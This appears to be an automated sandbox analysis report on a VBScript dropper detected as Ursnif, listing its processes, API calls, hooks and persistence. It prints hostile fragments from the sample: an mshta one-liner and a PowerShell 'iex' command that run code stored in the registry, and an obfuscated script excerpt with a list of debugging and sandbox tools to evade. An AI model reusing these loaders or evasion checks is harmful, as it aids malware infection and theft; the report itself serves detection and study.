Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D6EA0 39_2_0000019D8B7D6EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C6684 39_2_0000019D8B7C6684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C9500 39_2_0000019D8B7C9500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C1DF4 39_2_0000019D8B7C1DF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D4DE0 39_2_0000019D8B7D4DE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C5DBC 39_2_0000019D8B7C5DBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C559C 39_2_0000019D8B7C559C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D9408 39_2_0000019D8B7D9408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D3400 39_2_0000019D8B7D3400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B74A4 39_2_0000019D8B7B74A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C4484 39_2_0000019D8B7C4484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B4B60 39_2_0000019D8B7B4B60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D4354 39_2_0000019D8B7D4354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B1348 39_2_0000019D8B7B1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C8340 39_2_0000019D8B7C8340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CD328 39_2_0000019D8B7CD328
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D730C 39_2_0000019D8B7D730C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7BABDC 39_2_0000019D8B7BABDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DA3A4 39_2_0000019D8B7DA3A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D4BA0 39_2_0000019D8B7D4BA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CBA74 39_2_0000019D8B7CBA74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B9AD8 39_2_0000019D8B7B9AD8
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_012040DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 34_2_012040DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01208055 NtQueryVirtualMemory, 34_2_01208055
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CE95C NtSetContextThread,NtUnmapViewOfSection, 39_2_0000019D8B7CE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C1950 NtWriteVirtualMemory, 39_2_0000019D8B7C1950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CE860 NtQueryInformationProcess, 39_2_0000019D8B7CE860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread, 39_2_0000019D8B7DA8F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D20A4 NtQueryInformationToken,NtQueryInformationToken, 39_2_0000019D8B7D20A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C8B90 NtMapViewOfSection, 39_2_0000019D8B7C8B90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C5B80 NtCreateSection, 39_2_0000019D8B7C5B80
PE file does not import any functions
Source: 1cv1ijms.dll.41.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: start[526268].vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP' Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210910 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@17/16@6/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01202102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 34_2_01202102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{9E926C87-6559-80BB-DFB2-69B48306AD28}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: start[526268].vbs Static file information: File size 1402115 > 1048576
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01207E1F push ecx; ret 34_2_01207E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01207AB0 push ecx; ret 34_2_01207AB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7E1000 push eax; retf 39_2_0000019D8B7E1181
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7BC6E9 push 3B000001h; retf 39_2_0000019D8B7BC6EE
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\start[526268].vbs Jump to behavior
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
